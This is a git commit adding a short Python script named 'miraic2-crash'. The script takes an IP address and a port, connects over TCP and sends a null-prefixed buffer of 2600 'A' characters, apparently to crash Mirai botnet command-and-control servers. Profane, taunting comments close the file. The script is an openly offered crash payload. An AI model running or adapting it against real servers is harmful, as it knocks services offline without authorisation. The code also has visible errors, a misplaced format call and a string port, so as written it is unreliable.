Add 'miraic2-crash'

This commit is contained in:
DOLBY ATMOSFEAR 2020-09-23 17:31:22 +00:00
parent c014da8173
commit 226ddfcec5

20
miraic2-crash Normal file

@ -0,0 +1,20 @@
import socket
server_ip = input("IP: ")
c2_port = input("C2 Port: ")
print("Dropping {0}").format(server_ip)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #opens a TCP socket
c2connection = s.connect((server_ip,c2_port))
s.send('\x00\x00'+"A"*2600+'\r\n') #sending data
s.close() #closing the TCP socket
#fuck dickness and vaegene
#SkidWillBeSkid
#everyone can scan and wastes their bots